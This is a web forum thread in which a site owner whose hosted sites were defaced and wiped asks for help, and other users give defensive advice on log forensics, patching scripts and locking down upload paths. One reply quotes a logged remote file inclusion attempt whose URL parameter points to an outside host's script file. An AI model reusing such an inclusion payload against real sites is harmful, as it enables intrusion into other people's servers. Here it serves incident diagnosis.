pls help, my sites are hacked

all of my sites hosted at dreamhost being hacked today by Www.AvciHack.Com, they changed my main pages and delete my database.
I changed my FTP password but it is useless. plus, there is no visible strange file in my server as well.

could anyone give me some advice how to deal with this?

thanks a lot for your help.

 

What script were you using?

 

different scripts, some sites are static html.

 

Sounds like one of your PHP scripts got exploited. Make sure everything is up to date otherwise bots are going to exploit your sites time and time again.

 

What are the names and versions of the scripts you are using?

Some might have security vulnerbilities.

 

php exploits have been a pain in the butt for me! Lost a valuable database to them last year. Now I backup every other day.

I found wordpress has been an open door for hackers. They always change the config file and the index file.

 

one of my sites uses "software index script", not sure whether it is the reason.

 

This is most probably a php exploit...I fell foul to a wordpress hack when I was using the auto rss import script. The script imported a load of trojan which meant that every visitor to the site got a trojan. Received a complaint from the DC and had to close the account whilst I removed the offending script !

 

Have a look at the procedure there
http://forums.digitalpoint.com/showthread.php?t=547049
same is valid for you as well
1.
you really have to FIND the exact "door" of entry = vulnerability - hence you have to do access_log forensic research,
by using grep/zgrep
or by visual search of raw log lines
no matter the size of log

2.
wisdomtool's advice may be good but also may cost you thousands of $ ...
if you had that amount you most likely would have invested such amount in network/cyber security workshop - there too are in range of multi k$ for a few days.
since you did NOT - i assume you have NO such $
hence you have to sit down and do all on your own
possible=successful = just a matter of time and by the end you will feel better because you start to understand your own site / scripts

see also one of my most recent blog articles at
http://www.kriyayoga.com/love_blog/post.php/891

you search for unusual log entries like one of today's most recent hacker attempts

84.246.4.133 - - [24/Nov/2007:08:09:15 +0800] "GET /love_blog/zboard//include/write.php?dir=http://gw-gold.net/dragoc/id.txt? HTTP/1.1" 403 1014 "-" "libwww-perl/5.803"

hence you look among MANY other things for requests of existing or NON-existing URLs by automated scripts, attempts to UPLOAD/inject like in above example

you may also look in a separate run - using grep/zgrep in your access_log / error_log files for user agent

zgrep "libwww-perl" access_log-2007*.gz >>libwww-perl.txt

adapt above bash line with your own exact access_log file name
this writes output of grep / zgrep into file libwww-perl.txt

this is but one of many ways hackers try to get into your "panty" !! but this is a very frequent way and apparently fully automated using a variety of known vulnerabilities across the planet. hence you find such GET requests for files you may never had - but you also may find some of SW/scripts you have ...

calum's question is good
but now you have to Google for
every

"script_name_you_have security alert"

use above 3 keywords for G search BUT without quotes !!
then you may find known and published security issues about any of your installed scripts

you also may run a FULL nessus scan on your server - than only works if you have your OWN server - this again would show you possible KNOWN vulnerabilities on your server/site

reformatting/reinstalling IS NO solution - hours or days all will be as is NOW !!
you HAVE to search AND FIND !! no matter the time / efforts involved
remember as a criteria of motivation
the hackers did EXACTLY the same on your site - search and find - what "strangers" canb do - the owner needs to be able to do even faster, better and more efficiently !!!

meanwhile

you may at least
disable any password login
chmod 000 any and ALL URL-paths into login areas AND upload scripts
DISABLE any and every upload of ANY kind of file !! txt, jpg, gif or whatever !!!!!!!

 

Best way .. go and contact dreamhost staff ... as they can tell u what exactly happened ..

 

it is very unlikely that the host has time/money and resources to do the site owners job.
typically the host controls server - server is the least danger to get hacked
site owner in charge of all his installed SW = here is the greatest and typically the only danger to get hacked
host would need to know all your SW/scripts which is very unlikely

but the host may eventually assist you in giving access to ALL various log files needed to do all the forensic research needed - as outline in the posts a.m. to find your entry point and to thus secure your site.